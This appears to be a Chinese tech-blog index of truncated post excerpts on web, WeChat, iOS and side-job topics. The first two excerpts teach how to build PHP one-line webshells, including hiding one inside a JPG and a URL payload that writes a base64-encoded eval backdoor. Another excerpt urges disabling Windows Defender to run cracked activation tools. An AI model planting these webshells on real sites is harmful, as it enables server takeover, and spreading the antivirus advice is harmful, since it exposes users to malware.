技术分享

简单图片木马的生成与利用

首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST[‘a’]);?>,确保两个文件在同一个路径下。 紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击  进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们输入  start cmd;  进入 在cmd中输入 copy shell.jpg /b+txt.php/a jshell.jpg -b是指以二进制的方式合并复制文件,用于图像影音类文件;-a是指以ascii方式合并复制文件,用于文...

php一句话木马和图片木马的运行方法

标准的写法,直接通过eval执行php代码,如下: @eval ($_POST['code']); 动态执行assert生成一个木马文件(隐藏性最好的一种)如下: @$_GET['a']($_GET['code']); 使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件.如下: /index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; a参数为eval...

偶然间发现的千月影视后门漏洞

最近朋友的网站老是被黑,用各种软件查杀也没有查出问题来,于是各个代码找了一下。 发现了一个正常再正常不过的语句,但是这个语句就是后台漏洞,可以直接免登陆打开后台并查询更新修改数据库信息,特此记录! 很简单的几行代码,通过此方法可以跳过后台验证,并且可以执行数据的增删改查! 未免被恶意利用,特此收费,希望各位不要拿去做坏事哦 仅对部分版本的千月系统有效,如果你们有千月系统或者身边人有用这种系统的可以自查一下

phpmailer +thinkphp5实现发送邮箱验证码功能

最近几天给客户网站增加注册实现发送邮件验证码功能,特此记录一下; 1.上GitHub下载最新版第三方类库 PHPMailer; 也可以下载附件里的类库 2.解压,然后把文件夹加载进TP5.0中,放于application下的extend中; 3.注意下载的三个文件的命名空间的修改(加上namespace PHPMailer;附件里的已经加上) 4.在所需要添加发送验证码的控制文件开头中引入类库。 下面是具体的发送相关代码: /** * 发送邮箱验证码 * @return [type] [description] */ public function sendyxmsm() { $web_nam...

CenterOS下部署校园综合服务平台项目

一、安装环境 1.下载node.js安装包   wget https://nodejs.org/dist/v9.3.0/node-v9.3.0-linux-x64.tar.xz 也可以下载其他版本,node官网:https://nodejs.org/en/download/ 2.解压   tar xvf node-v9.3.0-linux-x64.tar.xz 3.创建软链接,就可以在所有目录中使用node和npm命令。   ln -s /root/node-v9.3.0-linux-x64/bin/node/usr/local/bin/node ln -s /r...

ipa分发原理,绕过苹果商店分发安装可制作ipa分发单页

首先了解下面的Plist代码,只需要改为IPA的地址,和ID,名称即可,保存为name.plist (name名字随你写,对应就行) 第二部搭建SSL环境,具体操作百度一堆资料,不详细介绍。 搭建以后,写个html的代码 下面这个我也是随便复制一段,测试很ok,自己可以去复制别人完整的 html下载单页简易代码 <a href="itms-services://?action=download-manifest&url=https://网站地址/name.plist" class="fourList"> <div class="icon64"> <span...

iframe 跨域访问session/cookie丢失问题解决方法

今天因工作需要,在一个域名A的页面中,使用iframe包含另一个域名B的页面。在chrome,firefox测试一切正常。 当测试到IE7时,发现域名B中的页面session失效,不能写入session。 网上搜索后了解, 因为IE有安全策略,限制页面不保存第三方cookie(当前访问域名A下的页面为第一方cookie,而域名B下的页面为第三方cookie)。 虽然有安全策略限制,但我们可以引入P3P声明允许第三方收集个人信息,使第三方cookie不被拒绝。 P3P:Platform for Privacy Preferences(隐私偏好平台)是W3C公布的一项隐私保护推荐标准,能够保护在线...

win10系统图片不能拖拽到PS软件中的解决方法

win10系统想必大家都非常熟悉吧,然而有时候可能会碰到win10系统图片不能拖拽到PS软件中的情况,想必大家都遇到过win10系统图片不能拖拽到PS软件中的情况吧,那么应该怎么处理win10系统图片不能拖拽到PS软件中呢?我们依照1、按下键盘上的Windows 键+R 组合键打开运行,在框中输入:regedit 点击确定 打开注册表; 2、在注册表左侧依次展开:HKHKEY_LOCAL_MACHINE/SOFTWARE/Microsoft ;这样的步骤就行了;下面小编带领大家看看win10系统图片不能拖拽到PS软件中的具体步骤: 步骤如下:   1、按下键盘上的Windows 键+...

Win系统解压压缩包,找不到【激活工具】和【补丁】解决方法!

在Win10系统中,【安装系统】或者【安装软件】第一件事就是激活,这应该是大部分人的操作了。然而非常意外的是,我的激活工具,居然点击后就被Windows defender直接杀掉了,不在回收站,没有找回选项。就是这么霸气的把我的文件删掉了。 在网上下载的大部分软件都包含【注册机】或者【激活补丁】,不是有毒的软件才会给查杀,如果使用易语言编写的注册机或者软件,都会报毒,并删除。所以你想安装激活软件,就必须关闭【Windows Defender】和Win 7关闭【流氓杀毒软件】。 解压压缩文件无【激活工具】的解决方法: 方法一:直接关闭【Windows Defender】和【流氓杀毒软件】,再解压...

最新联系腾讯客服人工方法-罗网 – 专注活动,软件,教程分享!总之就是网络那些事。

近几年腾讯客服非常难联系上,QQ上面找的全部都是机器人回复,打电话过去也是各种方式机器人解决你的问题,今天教大家一个方法可以直接电话联系上人工。 步骤如下 打开自己的手机拨打电话:075586013860 按提示操作绑定,然后微信会给你发一条消息 发起语音沟通,等待接通提示繁忙继续等!直到联系上为止。

腾讯视频M3U8获取下载MP4-罗网 – 专注活动,软件,教程分享!总之就是网络那些事。

复制以下代码,在浏览器收藏夹新建标签(快捷键是Ctrl+D),网址处粘贴以下代码。 如果代码复制使用有问题的下载蓝奏的文本复制:https://www.lanzoux.com/iIi1fe4rcbi javascript:var a=prompt(PLAYER._DownloadMonitor.context.dataset.title,PLAYER._DownloadMonitor.context.dataset.ckc?PLAYER._DownloadMonitor.context.dataset.currentVideoUrl:PLAYER._DownloadMonitor.c...

微信聊天官方提示消息框方法-罗网 – 专注活动,软件,教程分享!总之就是网络那些事。

最近在抖音看到非常有趣的微信“官方提醒”聊天框,今天给大家分享方法,可以逗逗朋友,挺好玩的! 步骤如下 设置你的微信名为你想要的提示类型,列如:官方提示 然后去聊天框随便发一条信息,长按自己发的消息可以看到“引用”功能。 引用后在输入框就可以看到效果了,再次发送任意消息即可看到提示效果。

DMCA数字版权信息反查资源-罗网 – 专注活动,软件,教程分享!总之就是网络那些事。

今天分享一种反向思维方法,感觉不错,可以触类旁通。 谷歌搜索提供了版权法案 (DMCA) 投诉,盗版内容则不显示在搜索结果中,在官网可以查看到存在盗版资源的网站。 比如,我在谷歌搜索昨天推荐的电视剧《隐秘的角落》,搜索结果页面下方查看被投诉的的内容,进入到数据库网站,罗列出含有《隐秘的角落》内容的盗版网站,有很多,随便点击进去一个,就可以找到该资源的盗版内容。 当然,这只是提供一个学习思路,版权还是需要尊重的,特别是在自己力所能及下最好支持下正版,虽然爱奇艺这个超前点播不太符合广大充值会员的利益。 6月2日北京互联网法院宣判“爱奇艺庆余年超前点播案”判决称爱奇艺“超前点播”违法,构成违约,被告...

iOS14/iPadOS14公测版升级文件-罗网 – 专注活动,软件,教程分享!总之就是网络那些事。

今天凌晨苹果全新系统发布了,废话不多说,赶紧来看看有什么新特性。 IOS 14 资源库:iOS 14 相比 iOS 13 更加开放。 如果你手机里有上百个 App ,iOS 14 资源库可以将他们一键按类别整合。 最常用的放在最上,不常用的放在下面,或者直接将后几页隐藏起来。 在最上方还有搜索栏,下滑弹出,直接搜索即可直达。 桌面小组件:和安卓类似,长按图标自动弹出变大。 小组件可以放在桌面的任意位置,还可以自由调节大小,选择信息量。 可以只放一个,也可以整屏都是小组件。 视频画中画 依旧和安卓类似,可以将播放的视频以画中画形式呈现,在播放中任意切换 App 都能保持视频播放…如果...

微信上线新功能:拍一拍-罗网 – 专注活动,软件,教程分享!总之就是网络那些事。

昨天微信在iOS和Android版本均上线了一个新功能“拍一拍”,微信用户在个人聊天或群聊中双击对方或自己的头像即可拍一拍,和早年 QQ 上的“窗口抖动”功能有异曲同工之妙。 拍一拍上线后,迅速被网友挖掘出各类玩法,包括有人给好友改了备注,玩起了词语接龙的游戏,例如「你拍了拍马屁」「你拍了拍自己的钱包」等等。 如果是老板在群内拍了拍你,有种得到老板肯定和鼓励内味,如果没人拍你,还可以“自拍”,这样还能强行挽尊一波?对于增强群活跃(刷存在感)真是个好东西。

苹果安卓用户均可修改微信号-罗网 – 专注活动,软件,教程分享!总之就是网络那些事。

6月16日置顶:官方已通告,苹果手机也可以改了! 先把微信更新到最新版本,然后打开微信->我->设置->账户与安全->微信号->修改即可(一年可以改一次) 必须要是最新版微信,如果改不了退出重新登录试试!还是没显示能修改就耐心等待,需要一个覆盖过程! 官方说明:https://mp.weixin.qq.com/s/uAJZ-9luDbTuLJuInGvGCA

102个各行副业赚钱平台汇总-罗网 – 专注活动,软件,教程分享!总之就是网络那些事。

在网络做副业赚钱,方法很多,平台也很多,尤其是兼职类,适合新手小白简单粗暴的赚钱方法,每天多赚一些零花钱轻轻松松,本次整合了102个副业赚钱平台,希望对大家有用。 任务类 做任务类的副业比较简单,没什么难度,也适合所有人,不过收益也有限,每天能赚个几十块钱。 (1)阿里众包 (2)腾讯搜活帮 (3)百度众测 (4)有道众包 (5)京东微工 (6)龙猫众包 (7)百川任务 跑腿类 跑腿类副业的工作性质,就是出卖体力,这本质上跟工地搬砖、送外卖、发传单没什么区别,只要你愿意干就行。 (8)美团众包 (9)蜂鸟众包 (10)点我达 (11)达达 (12)UU跑腿 (13)人人快送 拍照类 这个副业主...